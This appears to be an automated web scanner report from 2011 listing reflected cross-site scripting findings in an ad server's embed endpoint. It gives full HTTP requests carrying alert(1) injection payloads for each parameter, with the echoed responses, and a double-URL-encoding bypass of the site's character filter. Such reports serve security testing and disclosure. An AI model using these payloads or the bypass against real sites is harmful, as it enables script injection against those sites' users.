GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:17 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843277:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:17 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; re ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52705'-alert(1)-'5838e5807a8 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:45 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843305:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:45 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { docume ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0a2'-alert(1)-'eddc83441b0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:59 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843319:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:59 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b108 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3646'-alert(1)-'9d3890ffc58 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:55 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843315:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:55 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write(' ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d724'-alert(1)-'aba732753ad was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:41 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843301:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:41 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image35 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2488'-alert(1)-'0a19383e732 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:34 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843294:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:34 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fun ...[SNIP]...
5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2bdf'-alert(1)-'051170363a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:42:04 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:42:04 GMT; path=/ Set-Cookie: i_1=33:353:516:141:0:45001:1303843324:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:42:04 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 855
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8654"-alert(1)-"c50bffdece4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898d8654"-alert(1)-"c50bffdece4&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610b1"-alert(1)-"b260c77153e was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628610b1"-alert(1)-"b260c77153e&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8199f"-alert(1)-"f38ee686c59 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e38199f"-alert(1)-"f38ee686c59 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba1a"-alert(1)-"c5e1d0c5d1a was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQeba1a"-alert(1)-"c5e1d0c5d1a&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8 was submitted in the REST URL parameter 2. This input was echoed as c5ea9";alert(1)//3e6670df6b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:32 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408 was submitted in the REST URL parameter 3. This input was echoed as 5e00b";alert(1)//abbd6d3e408 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x305e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a78"-alert(1)-"a549992a4e6 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=2825348846a78"-alert(1)-"a549992a4e6&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf8a"-alert(1)-"17ee62d1a47 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G3cf8a"-alert(1)-"17ee62d1a47&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 983cb"-alert(1)-"b33569e6d27 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!983cb"-alert(1)-"b33569e6d27&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
